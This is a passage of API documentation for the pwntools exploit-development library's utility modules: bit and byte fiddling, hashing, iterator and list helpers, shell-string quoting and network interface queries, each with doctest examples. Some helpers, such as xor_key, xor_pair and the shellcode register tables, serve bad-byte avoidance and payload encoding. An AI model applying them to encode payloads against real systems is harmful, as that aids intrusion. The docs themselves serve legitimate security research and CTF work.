elements.Parameters: - alphabet – List or string to generate the sequence over.
- n (int) – The length of subsequences that should be unique.
pwnlib.util.fiddling
— Utilities bit fiddling¶
-
pwnlib.util.fiddling.
b64d
(s) → str[source]¶ Base64 decodes a string
Example
>>> b64d('dGVzdA==') 'test'
-
pwnlib.util.fiddling.
b64e
(s) → str[source]¶ Base64 encodes a string
Example
>>> b64e("test") 'dGVzdA=='
-
pwnlib.util.fiddling.
bits
(s, endian = 'big', zero = 0, one = 1) → list[source]¶ Converts the argument a list of bits.
Parameters: - s – A string or number to be converted into bits.
- endian (str) – The binary endian, default ‘big’.
- zero – The representing a 0-bit.
- one – The representing a 1-bit.
Returns: A list consisting of the values specified in zero and one.
Examples
>>> bits(511, zero = "+", one = "-") ['+', '+', '+', '+', '+', '+', '+', '-', '-', '-', '-', '-', '-', '-', '-', '-'] >>> sum(bits("test")) 17 >>> bits(0) [0, 0, 0, 0, 0, 0, 0, 0]
-
pwnlib.util.fiddling.
bits_str
(s, endian = 'big', zero = '0', one = '1') → str[source]¶ A wrapper around
bits()
, which converts the output into a string.Examples
>>> bits_str(511) '0000000111111111' >>> bits_str("bits_str", endian = "little") '0100011010010110001011101100111011111010110011100010111001001110'
-
pwnlib.util.fiddling.
bitswap
(s) → str[source]¶ Reverses the bits in every byte of a given string.
Example
>>> bitswap("1234") '\x8cL\xcc,'
-
pwnlib.util.fiddling.
bitswap_int
(n) → int[source]¶ Reverses the bits of a numbers and returns the result as a new number.
Parameters: Examples
>>> hex(bitswap_int(0x1234, 8)) '0x2c' >>> hex(bitswap_int(0x1234, 16)) '0x2c48' >>> hex(bitswap_int(0x1234, 24)) '0x2c4800' >>> hex(bitswap_int(0x1234, 25)) '0x589000'
-
pwnlib.util.fiddling.
enhex
(x) → str[source]¶ Hex-encodes a string.
Example
>>> enhex("test") '74657374'
-
pwnlib.util.fiddling.
hexdump_iter
(s, width=16, skip=True, hexii=False, begin=0, style=None, highlight=None, cyclic=False)[source]¶ - hexdump_iter(s, width = 16, skip = True, hexii = False, begin = 0,
- style = {}, highlight = []) -> str generator
Return a hexdump-dump of a string as a generator of lines.
Parameters: - s (str) – The string to dump
- width (int) – The number of characters per line
- skip (bool) – Set to True, if repeated lines should be replaced by a “*”
- hexii (bool) – Set to True, if a hexii-dump should be returned instead of a hexdump.
- begin (int) – Offset of the first byte to print in the left column
- style (dict) – Color scheme to use.
- highlight (iterable) – Byte values to highlight.
- cyclic (bool) – Attempt to skip consecutive, unmodified cyclic lines
Returns: A hexdump-dump in the form of a string.
-
pwnlib.util.fiddling.
hexii
(s, width = 16, skip = True) → str[source]¶ Return a HEXII-dump of a string.
Parameters: Returns: A HEXII-dump in the form of a string.
-
pwnlib.util.fiddling.
naf
(int) → int generator[source]¶ Returns a generator for the non-adjacent form (NAF[1]) of a number, n. If naf(n) generates z_0, z_1, ..., then n == z_0 + z_1 * 2 + z_2 * 2**2, ....
[1] https://en.wikipedia.org/wiki/Non-adjacent_form
Example
>>> n = 45 >>> m = 0 >>> x = 1 >>> for z in naf(n): ... m += x * z ... x *= 2 >>> n == m True
-
pwnlib.util.fiddling.
randoms
(count, alphabet = string.lowercase) → str[source]¶ Returns a random string of a given length using only the specified alphabet.
Parameters: - count (int) – The length of the desired string.
- alphabet – The alphabet of allowed characters. Defaults to all lowercase characters.
Returns: A random string.
Example
>>> randoms(10) 'evafjilupm'
-
pwnlib.util.fiddling.
rol
(n, k, word_size=None)[source]¶ Returns a rotation by k of n.
When n is a number, then means
((n << k) | (n >> (word_size - k)))
truncated to word_size bits.When n is a list, tuple or string, this is
n[k % len(n):] + n[:k % len(n)]
.Parameters: Example
>>> rol('abcdefg', 2) 'cdefgab' >>> rol('abcdefg', -2) 'fgabcde' >>> hex(rol(0x86, 3, 8)) '0x34' >>> hex(rol(0x86, -3, 8)) '0xd0'
-
pwnlib.util.fiddling.
ror
(n, k, word_size=None)[source]¶ A simple wrapper around
rol()
, which negates the values of k.
-
pwnlib.util.fiddling.
unbits
(s, endian = 'big') → str[source]¶ Converts an iterable of bits into a string.
Parameters: - s – Iterable of bits
- endian (str) – The string “little” or “big”, which specifies the bits endianness.
Returns: A string of the decoded bits.
Example
>>> unbits([1]) '\x80' >>> unbits([1], endian = 'little') '\x01' >>> unbits(bits('hello'), endian = 'little') '\x16\xa666\xf6'
-
pwnlib.util.fiddling.
unhex
(s) → str[source]¶ Hex-decodes a string.
Example
>>> unhex("74657374") 'test' >>> unhex("F\n") '\x0f'
-
pwnlib.util.fiddling.
urldecode
(s, ignore_invalid = False) → str[source]¶ URL-decodes a string.
Example
>>> urldecode("test%20%41") 'test A' >>> urldecode("%qq") Traceback (most recent call last): ... ValueError: Invalid input to urldecode >>> urldecode("%qq", ignore_invalid = True) '%qq'
-
pwnlib.util.fiddling.
urlencode
(s) → str[source]¶ URL-encodes a string.
Example
>>> urlencode("test") '%74%65%73%74'
-
pwnlib.util.fiddling.
xor
(*args, cut = 'max') → str[source]¶ Flattens its arguments using
pwnlib.util.packing.flat()
and then xors them together. If the end of a string is reached, it wraps around in the string.Parameters: - args – The arguments to be xor’ed together.
- cut – How long a string should be returned. Can be either ‘min’/’max’/’left’/’right’ or a number.
Returns: The string of the arguments xor’ed together.
Example
>>> xor('lol', 'hello', 42) '. ***'
-
pwnlib.util.fiddling.
xor_key
(data, size=None, avoid='x00n') -> None or (int, str)[source]¶ Finds a
size
-width value that can be XORed with a string to producedata
, while neither the XOR value or XOR string contain any bytes inavoid
.Parameters: Returns: A tuple containing two strings; the XOR key and the XOR string. If no such pair exists, None is returned.
Example
>>> xor_key("Hello, world") ('\x01\x01\x01\x01', 'Idmmn-!vnsme')
-
pwnlib.util.fiddling.
xor_pair
(data, avoid = 'x00n') -> None or (str, str)[source]¶ Finds two strings that will xor into a given string, while only using a given alphabet.
Parameters: - data (str) – The desired string.
- avoid – The list of disallowed characters. Defaults to nulls and newlines.
Returns: Two strings which will xor to the given string. If no such two strings exist, then None is returned.
Example
>>> xor_pair("test") ('\x01\x01\x01\x01', 'udru')
pwnlib.util.hashes
— Hashing functions¶
Functions for computing various hashes of files and strings.
-
pwnlib.util.hashes.
sha224filehex
(x)[source]¶ Calculates the sha224 sum of a file; returns hex-encoded
-
pwnlib.util.hashes.
sha224sumhex
(x)[source]¶ Calculates the sha224 sum of a string; returns hex-encoded
-
pwnlib.util.hashes.
sha256filehex
(x)[source]¶ Calculates the sha256 sum of a file; returns hex-encoded
-
pwnlib.util.hashes.
sha256sumhex
(x)[source]¶ Calculates the sha256 sum of a string; returns hex-encoded
-
pwnlib.util.hashes.
sha384filehex
(x)[source]¶ Calculates the sha384 sum of a file; returns hex-encoded
-
pwnlib.util.hashes.
sha384sumhex
(x)[source]¶ Calculates the sha384 sum of a string; returns hex-encoded
pwnlib.util.iters
— Extension of standard module itertools
¶
This module includes and extends the standard module itertools
.
-
pwnlib.util.iters.
bruteforce
(func, alphabet, length, method = 'upto', start = None)[source]¶ Bruteforce func to return
True
. func should take a string input and return abool()
. func will be called with strings from alphabet until it returnsTrue
or the search space has been exhausted.The argument start can be used to split the search space, which is useful if multiple CPU cores are available.
Parameters: - func (function) – The function to bruteforce.
- alphabet – The alphabet to draw symbols from.
- length – Longest string to try.
- method – If ‘upto’ try strings of length
1 .. length
, if ‘fixed’ only try strings of lengthlength
and if ‘downfrom’ try strings of lengthlength .. 1
. - start – a tuple
(i, N)
which splits the search space up into N pieces and starts at piece i (1..N).None
is equivalent to(1, 1)
.
Returns: A string s such that
func(s)
returnsTrue
orNone
if the search space was exhausted.Example
>>> bruteforce(lambda x: x == 'hello', string.lowercase, length = 10) 'hello' >>> bruteforce(lambda x: x == 'hello', 'hllo', 5) is None True
-
pwnlib.util.iters.
mbruteforce
(func, alphabet, length, method = 'upto', start = None, threads = None)[source]¶ Same functionality as bruteforce(), but multithreaded.
Parameters: - alphabet, length, method, start (func,) – same as for bruteforce()
- threads – Amount of threads to spawn, default is the amount of cores.
-
pwnlib.util.iters.
chained
(func)[source]¶ A decorator chaining the results of func. Useful for generators.
Parameters: func (function) – The function being decorated. Returns: A generator function whoose elements are the concatenation of the return values from func(*args, **kwargs)
.Example
>>> @chained ... def g(): ... for x in count(): ... yield (x, -x) >>> take(6, g()) [0, 0, 1, -1, 2, -2]
-
pwnlib.util.iters.
consume
(n, iterator)[source]¶ Advance the iterator n steps ahead. If n is :const:`None, consume everything.
Parameters: - n (int) – Number of elements to consume.
- iterator (iterator) – An iterator.
Returns: None
.Examples
>>> i = count() >>> consume(5, i) >>> i.next() 5 >>> i = iter([1, 2, 3, 4, 5]) >>> consume(2, i) >>> list(i) [3, 4, 5]
-
pwnlib.util.iters.
cyclen
(n, iterable) → iterator[source]¶ Repeats the elements of iterable n times.
Parameters: - n (int) – The number of times to repeat iterable.
- iterable – An iterable.
Returns: An iterator whoose elements are the elements of iterator repeated n times.
Examples
>>> take(4, cyclen(2, [1, 2])) [1, 2, 1, 2] >>> list(cyclen(10, [])) []
-
pwnlib.util.iters.
dotproduct
(x, y) → int[source]¶ Computes the dot product of x and y.
Parameters: - x (iterable) – An iterable.
- x – An iterable.
Returns: x[0] * y[0] + x[1] * y[1] + ...
.Return type: The dot product of x and y, i.e.
Example
>>> dotproduct([1, 2, 3], [4, 5, 6]) ... # 1 * 4 + 2 * 5 + 3 * 6 == 32 32
-
pwnlib.util.iters.
flatten
(xss) → iterator[source]¶ Flattens one level of nesting; when xss is an iterable of iterables, returns an iterator whoose elements is the concatenation of the elements of xss.
Parameters: xss – An iterable of iterables. Returns: An iterator whoose elements are the concatenation of the iterables in xss. Examples
>>> list(flatten([[1, 2], [3, 4]])) [1, 2, 3, 4] >>> take(6, flatten([[43, 42], [41, 40], count()])) [43, 42, 41, 40, 0, 1]
-
pwnlib.util.iters.
group
(n, iterable, fill_value = None) → iterator[source]¶ Similar to
pwnlib.util.lists.group()
, but returns an iterator and usesitertools
fast build-in functions.Parameters: - n (int) – The group size.
- iterable – An iterable.
- fill_value – The value to fill into the remaining slots of the last group if the n does not divide the number of elements in iterable.
Returns: An iterator whoose elements are n-tuples of the elements of iterable.
Examples
>>> list(group(2, range(5))) [(0, 1), (2, 3), (4, None)] >>> take(3, group(2, count())) [(0, 1), (2, 3), (4, 5)] >>> [''.join(x) for x in group(3, 'ABCDEFG', 'x')] ['ABC', 'DEF', 'Gxx']
-
pwnlib.util.iters.
iter_except
(func, exception)[source]¶ Calls func repeatedly until an exception is raised. Works like the build-in
iter()
but uses an exception instead of a sentinel to signal the end.Parameters: - func – The function to call.
- exception (exception) – The exception that signals the end. Other exceptions will not be caught.
Returns: An iterator whoose elements are the results of calling
func()
until an exception matching exception is raised.Examples
>>> s = {1, 2, 3} >>> i = iter_except(s.pop, KeyError) >>> i.next() 1 >>> i.next() 2 >>> i.next() 3 >>> i.next() Traceback (most recent call last): ... StopIteration
-
pwnlib.util.iters.
lexicographic
(alphabet) → iterator[source]¶ The words with symbols in alphabet, in lexicographic order (determined by the order of alphabet).
Parameters: alphabet – The alphabet to draw symbols from. Returns: An iterator of the words with symbols in alphabet, in lexicographic order. Example
>>> take(8, imap(lambda x: ''.join(x), lexicographic('01'))) ['', '0', '1', '00', '01', '10', '11', '000']
-
pwnlib.util.iters.
lookahead
(n, iterable) → object[source]¶ Inspects the upcoming element at index n without advancing the iterator. Raises
IndexError
if iterable has too few elements.Parameters: - n (int) – Index of the element to return.
- iterable – An iterable.
Returns: The element in iterable at index n.
Examples
>>> i = count() >>> lookahead(4, i) 4 >>> i.next() 0 >>> i = count() >>> nth(4, i) 4 >>> i.next() 5 >>> lookahead(4, i) 10
-
pwnlib.util.iters.
nth
(n, iterable, default = None) → object[source]¶ Returns the element at index n in iterable. If iterable is a iterator it will be advanced.
Parameters: - n (int) – Index of the element to return.
- iterable – An iterable.
- default (objext) – A default value.
Returns: The element at index n in iterable or default if iterable has too few elements.
Examples
>>> nth(2, [0, 1, 2, 3]) 2 >>> nth(2, [0, 1], 42) 42 >>> i = count() >>> nth(42, i) 42 >>> nth(42, i) 85
-
pwnlib.util.iters.
pad
(iterable, value = None) → iterator[source]¶ Pad an iterable with value, i.e. returns an iterator whoose elements are first the elements of iterable then value indefinitely.
Parameters: - iterable – An iterable.
- value – The value to pad with.
Returns: An iterator whoose elements are first the elements of iterable then value indefinitely.
Examples
>>> take(3, pad([1, 2])) [1, 2, None] >>> i = pad(iter([1, 2, 3]), 42) >>> take(2, i) [1, 2] >>> take(2, i) [3, 42] >>> take(2, i) [42, 42]
-
pwnlib.util.iters.
pairwise
(iterable) → iterator[source]¶ Parameters: iterable – An iterable. Returns: An iterator whoose elements are pairs of neighbouring elements of iterable. Examples
>>> list(pairwise([1, 2, 3, 4])) [(1, 2), (2, 3), (3, 4)] >>> i = starmap(operator.add, pairwise(count())) >>> take(5, i) [1, 3, 5, 7, 9]
-
pwnlib.util.iters.
powerset
(iterable, include_empty = True) → iterator[source]¶ The powerset of an iterable.
Parameters: - iterable – An iterable.
- include_empty (bool) – Whether to include the empty set.
Returns: The powerset of iterable as an interator of tuples.
Examples
>>> list(powerset(range(3))) [(), (0,), (1,), (2,), (0, 1), (0, 2), (1, 2), (0, 1, 2)] >>> list(powerset(range(2), include_empty = False)) [(0,), (1,), (0, 1)]
-
pwnlib.util.iters.
quantify
(iterable, pred = bool) → int[source]¶ Count how many times the predicate pred is
True
.Parameters: - iterable – An iterable.
- pred – A function that given an element from iterable returns either
True
orFalse
.
Returns: The number of elements in iterable for which pred returns
True
.Examples
>>> quantify([1, 2, 3, 4], lambda x: x % 2 == 0) 2 >>> quantify(['1', 'two', '3', '42'], str.isdigit) 3
-
pwnlib.util.iters.
random_combination
(iterable, r) → tuple[source]¶ Parameters: - iterable – An iterable.
- r (int) – Size of the combination.
Returns: A random element from
itertools.combinations(iterable, r = r)
.Examples
>>> random_combination(range(2), 2) (0, 1) >>> random_combination(range(10), r = 2) in combinations(range(10), r = 2) True
-
pwnlib.util.iters.
random_combination_with_replacement
(iterable, r)[source]¶ random_combination(iterable, r) -> tuple
Parameters: - iterable – An iterable.
- r (int) – Size of the combination.
Returns: A random element from
itertools.combinations_with_replacement(iterable, r = r)
.Examples
>>> cs = {(0, 0), (0, 1), (1, 1)} >>> random_combination_with_replacement(range(2), 2) in cs True >>> i = combinations_with_replacement(range(10), r = 2) >>> random_combination_with_replacement(range(10), r = 2) in i True
-
pwnlib.util.iters.
random_permutation
(iterable, r=None)[source]¶ random_product(iterable, r = None) -> tuple
Parameters: - iterable – An iterable.
- r (int) – Size of the permutation. If
None
select all elements in iterable.
Returns: A random element from
itertools.permutations(iterable, r = r)
.Examples
>>> random_permutation(range(2)) in {(0, 1), (1, 0)} True >>> random_permutation(range(10), r = 2) in permutations(range(10), r = 2) True
-
pwnlib.util.iters.
random_product
(*args, repeat = 1) → tuple[source]¶ Parameters: - args – One or more iterables
- repeat (int) – Number of times to repeat args.
Returns: A random element from
itertools.product(*args, repeat = repeat)
.Examples
>>> args = (range(2), range(2)) >>> random_product(*args) in {(0, 0), (0, 1), (1, 0), (1, 1)} True >>> args = (range(3), range(3), range(3)) >>> random_product(*args, repeat = 2) in product(*args, repeat = 2) True
-
pwnlib.util.iters.
repeat_func
(func, *args, **kwargs) → iterator[source]¶ Repeatedly calls func with positional arguments args and keyword arguments kwargs. If no keyword arguments is given the resulting iterator will be computed using only functions from
itertools
which are very fast.Parameters: - func (function) – The function to call.
- args – Positional arguments.
- kwargs – Keyword arguments.
Returns: An iterator whoose elements are the results of calling
func(*args, **kwargs)
repeatedly.Examples
>>> def f(x): ... x[0] += 1 ... return x[0] >>> i = repeat_func(f, [0]) >>> take(2, i) [1, 2] >>> take(2, i) [3, 4] >>> def f(**kwargs): ... return kwargs.get('x', 43) >>> i = repeat_func(f, x = 42) >>> take(2, i) [42, 42] >>> i = repeat_func(f, 42) >>> take(2, i) Traceback (most recent call last): ... TypeError: f() takes exactly 0 arguments (1 given)
-
pwnlib.util.iters.
roundrobin
(*iterables)[source]¶ Take elements from iterables in a round-robin fashion.
Parameters: *iterables – One or more iterables. Returns: An iterator whoose elements are taken from iterables in a round-robin fashion. Examples
>>> ''.join(roundrobin('ABC', 'D', 'EF')) 'ADEBFC' >>> ''.join(take(10, roundrobin('ABC', 'DE', repeat('x')))) 'ADxBExCxxx'
-
pwnlib.util.iters.
tabulate
(func, start = 0) → iterator[source]¶ Parameters: Returns: An iterator with the elements
func(start), func(start + 1), ...
.Examples
>>> take(2, tabulate(str)) ['0', '1'] >>> take(5, tabulate(lambda x: x**2, start = 1)) [1, 4, 9, 16, 25]
-
pwnlib.util.iters.
take
(n, iterable) → list[source]¶ Returns first n elements of iterable. If iterable is a iterator it will be advanced.
Parameters: - n (int) – Number of elements to take.
- iterable – An iterable.
Returns: A list of the first n elements of iterable. If there are fewer than n elements in iterable they will all be returned.
Examples
>>> take(2, range(10)) [0, 1] >>> i = count() >>> take(2, i) [0, 1] >>> take(2, i) [2, 3] >>> take(9001, [1, 2, 3]) [1, 2, 3]
-
pwnlib.util.iters.
unique_everseen
(iterable, key = None) → iterator[source]¶ Get unique elements, preserving order. Remember all elements ever seen. If key is not
None
then for each elementelm
in iterable the element that will be rememberes iskey(elm)
. Otherwiseelm
is remembered.Parameters: - iterable – An iterable.
- key – A function to map over each element in iterable before remembering
it. Setting to
None
is equivalent to the identity function.
Returns: An iterator of the unique elements in iterable.
Examples
>>> ''.join(unique_everseen('AAAABBBCCDAABBB')) 'ABCD' >>> ''.join(unique_everseen('ABBCcAD', str.lower)) 'ABCD'
-
pwnlib.util.iters.
unique_justseen
(iterable, key=None)[source]¶ unique_everseen(iterable, key = None) -> iterator
Get unique elements, preserving order. Remember only the elements just seen. If key is not
None
then for each elementelm
in iterable the element that will be rememberes iskey(elm)
. Otherwiseelm
is remembered.Parameters: - iterable – An iterable.
- key – A function to map over each element in iterable before remembering
it. Setting to
None
is equivalent to the identity function.
Returns: An iterator of the unique elements in iterable.
Examples
>>> ''.join(unique_justseen('AAAABBBCCDAABBB')) 'ABCDAB' >>> ''.join(unique_justseen('ABBCcAD', str.lower)) 'ABCAD'
-
pwnlib.util.iters.
unique_window
(iterable, window, key=None)[source]¶ unique_everseen(iterable, window, key = None) -> iterator
Get unique elements, preserving order. Remember only the last window elements seen. If key is not
None
then for each elementelm
in iterable the element that will be rememberes iskey(elm)
. Otherwiseelm
is remembered.Parameters: - iterable – An iterable.
- window (int) – The number of elements to remember.
- key – A function to map over each element in iterable before remembering
it. Setting to
None
is equivalent to the identity function.
Returns: An iterator of the unique elements in iterable.
Examples
>>> ''.join(unique_window('AAAABBBCCDAABBB', 6)) 'ABCDA' >>> ''.join(unique_window('ABBCcAD', 5, str.lower)) 'ABCD' >>> ''.join(unique_window('ABBCcAD', 4, str.lower)) 'ABCAD'
-
pwnlib.util.iters.
chain
()[source]¶ Alias for
itertools.chain()
.
-
pwnlib.util.iters.
combinations
()[source]¶ Alias for
itertools.combinations()
-
pwnlib.util.iters.
compress
()[source]¶ Alias for
itertools.compress()
-
pwnlib.util.iters.
count
()[source]¶ Alias for
itertools.count()
-
pwnlib.util.iters.
cycle
()[source]¶ Alias for
itertools.cycle()
-
pwnlib.util.iters.
dropwhile
()[source]¶ Alias for
itertools.dropwhile()
-
pwnlib.util.iters.
groupby
()[source]¶ Alias for
itertools.groupby()
-
pwnlib.util.iters.
ifilter
()[source]¶ Alias for
itertools.ifilter()
-
pwnlib.util.iters.
ifilterfalse
()[source]¶ Alias for
itertools.ifilterfalse()
-
pwnlib.util.iters.
imap
()[source]¶ Alias for
itertools.imap()
-
pwnlib.util.iters.
islice
()[source]¶ Alias for
itertools.islice()
-
pwnlib.util.iters.
izip
()[source]¶ Alias for
itertools.izip()
-
pwnlib.util.iters.
izip_longest
()[source]¶ Alias for
itertools.izip_longest()
-
pwnlib.util.iters.
permutations
()[source]¶ Alias for
itertools.permutations()
-
pwnlib.util.iters.
product
()[source]¶ Alias for
itertools.product()
-
pwnlib.util.iters.
repeat
()[source]¶ Alias for
itertools.repeat()
-
pwnlib.util.iters.
starmap
()[source]¶ Alias for
itertools.starmap()
-
pwnlib.util.iters.
takewhile
()[source]¶ Alias for
itertools.takewhile()
-
pwnlib.util.iters.
tee
()[source]¶ Alias for
itertools.tee()
pwnlib.util.lists
— Operations on lists¶
-
pwnlib.util.lists.
concat
(l) → list[source]¶ Concats a list of lists into a list.
Example
>>> concat([[1, 2], [3]]) [1, 2, 3]
-
pwnlib.util.lists.
concat_all
(*args) → list[source]¶ Concats all the arguments together.
Example
>>> concat_all(0, [1, (2, 3)], [([[4, 5, 6]])]) [0, 1, 2, 3, 4, 5, 6]
-
pwnlib.util.lists.
findall
(l, e) → l[source]¶ Generate all indices of needle in haystack, using the Knuth-Morris-Pratt algorithm.
Example
>>> foo = findall([1,2,3,4,4,3,4,2,1], 4) >>> foo.next() 3 >>> foo.next() 4 >>> foo.next() 6
-
pwnlib.util.lists.
group
(n, lst, underfull_action = 'ignore', fill_value = None) → list[source]¶ Split sequence into subsequences of given size. If the values cannot be evenly distributed among into groups, then the last group will either be returned as is, thrown out or padded with the value specified in fill_value.
Parameters: Returns: A list containing the grouped values.
Example
>>> group(3, "ABCDEFG") ['ABC', 'DEF', 'G'] >>> group(3, 'ABCDEFG', 'drop') ['ABC', 'DEF'] >>> group(3, 'ABCDEFG', 'fill', 'Z') ['ABC', 'DEF', 'GZZ'] >>> group(3, list('ABCDEFG'), 'fill') [['A', 'B', 'C'], ['D', 'E', 'F'], ['G', None, None]]
-
pwnlib.util.lists.
ordlist
(s) → list[source]¶ Turns a string into a list of the corresponding ascii values.
Example
>>> ordlist("hello") [104, 101, 108, 108, 111]
-
pwnlib.util.lists.
partition
(lst, f, save_keys = False) → list[source]¶ Partitions an iterable into sublists using a function to specify which group they belong to.
It works by calling f on every element and saving the results into an
collections.OrderedDict
.Parameters: Example
>>> partition([1,2,3,4,5], lambda x: x&1) [[1, 3, 5], [2, 4]]
pwnlib.util.misc
— We could not fit it any other place¶
-
pwnlib.util.misc.
align
(alignment, x) → int[source]¶ Rounds x up to nearest multiple of the alignment.
Example
>>> [align(5, n) for n in range(15)] [0, 5, 5, 5, 5, 5, 10, 10, 10, 10, 10, 15, 15, 15, 15]
-
pwnlib.util.misc.
align_down
(alignment, x) → int[source]¶ Rounds x down to nearest multiple of the alignment.
Example
>>> [align_down(5, n) for n in range(15)] [0, 0, 0, 0, 0, 5, 5, 5, 5, 5, 10, 10, 10, 10, 10]
-
pwnlib.util.misc.
binary_ip
(host) → str[source]¶ Resolve host and return IP as four byte string.
Example
>>> binary_ip("127.0.0.1") '\x7f\x00\x00\x01'
-
pwnlib.util.misc.
parse_ldd_output
(output)[source]¶ Parses the output from a run of ‘ldd’ on a binary. Returns a dictionary of {path: address} for each library required by the specified binary.
Parameters: output (str) – The output to parse Example
>>> sorted(parse_ldd_output(''' ... linux-vdso.so.1 => (0x00007fffbf5fe000) ... libtinfo.so.5 => /lib/x86_64-linux-gnu/libtinfo.so.5 (0x00007fe28117f000) ... libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe280f7b000) ... libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe280bb4000) ... /lib64/ld-linux-x86-64.so.2 (0x00007fe2813dd000) ... ''').keys()) ['/lib/x86_64-linux-gnu/libc.so.6', '/lib/x86_64-linux-gnu/libdl.so.2', '/lib/x86_64-linux-gnu/libtinfo.so.5', '/lib64/ld-linux-x86-64.so.2']
-
pwnlib.util.misc.
read
(path, count=-1, skip=0) → str[source]¶ Open file, return content.
Examples
>>> read('pwnlib/util/misc.py').split('\n')[0] 'import base64'
-
pwnlib.util.misc.
register_sizes
(regs, in_sizes)[source]¶ Create dictionaries over register sizes and relations
Given a list of lists of overlapping register names (e.g. [‘eax’,’ax’,’al’,’ah’]) and a list of input sizes, it returns the following:
- all_regs : list of all valid registers
- sizes[reg] : the size of reg in bits
- bigger[reg] : list of overlapping registers bigger than reg
- smaller[reg]: list of overlapping registers smaller than reg
Used in i386/AMD64 shellcode, e.g. the mov-shellcode.
Example
>>> regs = [['eax', 'ax', 'al', 'ah'],['ebx', 'bx', 'bl', 'bh'], ... ['ecx', 'cx', 'cl', 'ch'], ... ['edx', 'dx', 'dl', 'dh'], ... ['edi', 'di'], ... ['esi', 'si'], ... ['ebp', 'bp'], ... ['esp', 'sp'], ... ] >>> all_regs, sizes, bigger, smaller = register_sizes(regs, [32, 16, 8, 8]) >>> all_regs ['eax', 'ax', 'al', 'ah', 'ebx', 'bx', 'bl', 'bh', 'ecx', 'cx', 'cl', 'ch', 'edx', 'dx', 'dl', 'dh', 'edi', 'di', 'esi', 'si', 'ebp', 'bp', 'esp', 'sp'] >>> sizes {'ch': 8, 'cl': 8, 'ah': 8, 'edi': 32, 'al': 8, 'cx': 16, 'ebp': 32, 'ax': 16, 'edx': 32, 'ebx': 32, 'esp': 32, 'esi': 32, 'dl': 8, 'dh': 8, 'di': 16, 'bl': 8, 'bh': 8, 'eax': 32, 'bp': 16, 'dx': 16, 'bx': 16, 'ecx': 32, 'sp': 16, 'si': 16} >>> bigger {'ch': ['ecx', 'cx', 'ch'], 'cl': ['ecx', 'cx', 'cl'], 'ah': ['eax', 'ax', 'ah'], 'edi': ['edi'], 'al': ['eax', 'ax', 'al'], 'cx': ['ecx', 'cx'], 'ebp': ['ebp'], 'ax': ['eax', 'ax'], 'edx': ['edx'], 'ebx': ['ebx'], 'esp': ['esp'], 'esi': ['esi'], 'dl': ['edx', 'dx', 'dl'], 'dh': ['edx', 'dx', 'dh'], 'di': ['edi', 'di'], 'bl': ['ebx', 'bx', 'bl'], 'bh': ['ebx', 'bx', 'bh'], 'eax': ['eax'], 'bp': ['ebp', 'bp'], 'dx': ['edx', 'dx'], 'bx': ['ebx', 'bx'], 'ecx': ['ecx'], 'sp': ['esp', 'sp'], 'si': ['esi', 'si']} >>> smaller {'ch': [], 'cl': [], 'ah': [], 'edi': ['di'], 'al': [], 'cx': ['cl', 'ch'], 'ebp': ['bp'], 'ax': ['al', 'ah'], 'edx': ['dx', 'dl', 'dh'], 'ebx': ['bx', 'bl', 'bh'], 'esp': ['sp'], 'esi': ['si'], 'dl': [], 'dh': [], 'di': [], 'bl': [], 'bh': [], 'eax': ['ax', 'al', 'ah'], 'bp': [], 'dx': ['dl', 'dh'], 'bx': ['bl', 'bh'], 'ecx': ['cx', 'cl', 'ch'], 'sp': [], 'si': []}
-
pwnlib.util.misc.
run_in_new_terminal
(command, terminal = None) → None[source]¶ Run a command in a new terminal.
- When terminal is not set:
- If context.terminal is set it will be used. If it is an iterable then context.terminal[1:] are default arguments.
- If X11 is detected (by the presence of the
DISPLAY
environment variable),x-terminal-emulator
is used. - If tmux is detected (by the presence of the
TMUX
environment variable), a new pane will be opened.
Parameters: Returns: None
-
pwnlib.util.misc.
sh_string
(s)[source]¶ Outputs a string in a format that will be understood by /bin/sh.
If the string does not contain any bad characters, it will simply be returned, possibly with quotes. If it contains bad characters, it will be escaped in a way which is compatible with most known systems.
Examples
>>> print sh_string('foobar') foobar >>> print sh_string('foo bar') 'foo bar' >>> print sh_string("foo'bar") "foo'bar" >>> print sh_string("foo\\bar") 'foo\bar' >>> print sh_string("foo\\'bar") "foo\\'bar" >>> print sh_string("foo\x01'bar") "$( (echo Zm9vASdiYXI=|(base64 -d||openssl enc -d -base64)||echo -en 'foo\x01\x27bar') 2>/dev/null)" >>> print subprocess.check_output("echo -n " + sh_string("foo\\'bar"), shell = True) foo\'bar
-
pwnlib.util.misc.
size
(n, abbriv = 'B', si = False) → str[source]¶ Convert the length of a bytestream to human readable form.
Parameters: - n (int,str) – The length to convert to human readable form
- abbriv (str) –
Example
>>> size(451) '451B' >>> size(1000) '1000B' >>> size(1024) '1.00KB' >>> size(1024, si = True) '1.02KB' >>> [size(1024 ** n) for n in range(7)] ['1B', '1.00KB', '1.00MB', '1.00GB', '1.00TB', '1.00PB', '1024.00PB']
-
pwnlib.util.misc.
which
(name, flags = os.X_OK, all = False) → str or str set[source]¶ Works as the system command
which
; searches $PATH forname
and returns a full path if found.If all is
True
the set of all found locations is returned, else the first occurence orNone
is returned.Parameters: Returns: If all is
True
the set of all locations where name was found, else the first location orNone
if not found.Example
>>> which('sh') '/bin/sh'
pwnlib.util.net
— Networking interfaces¶
-
pwnlib.util.net.
getifaddrs
() → dict list[source]¶ A wrapper for libc’s
getifaddrs
.Parameters: None – Returns: list of dictionaries each representing a struct ifaddrs. The dictionaries have the fields name, flags, family, addr and netmask. Refer to getifaddrs(3) for details. The fields addr and netmask are themselves dictionaries. Their structure depend on family. If family is not socket.AF_INET
orsocket.AF_INET6
they will be empty.
-
pwnlib.util.net.
interfaces
(all = False) → dict[source]¶ Parameters: - all (bool) – Whether to include interfaces with not associated address.
- Default –
False
.
Returns: A dictionary mapping each of the hosts interfaces to a list of it’s addresses. Each entry in the list is a tuple
(family, addr)
, and family is eithersocket.AF_INET
orsocket.AF_INET6
.
-
pwnlib.util.net.
interfaces4
(all = False) → dict[source]¶ As
interfaces()
but only includes IPv4 addresses and the lists in the dictionary only contains the addresses not the family.Parameters: - all (bool) – Whether to include interfaces with not associated address.
- Default –
False
.
Returns: A dictionary mapping each of the hosts interfaces to a list of it’s IPv4 addresses.
-
pwnlib.util.net.
interfaces6
(all = False) → dict[source]¶ As
interfaces()
but only includes IPv6 addresses and the lists in the dictionary only contains the addresses not the family.Parameters: - all (bool) – Whether to include interfaces with not associated address.
- Default –
False
.
Returns: A dictionary mapping each of the hosts interfaces to a list of it’s IPv6 addresses.
pwnlib.util.packing
— Packing and unpacking of strings¶
Module for packing and unpacking integers.
Simplifies access to the standard struct.pack
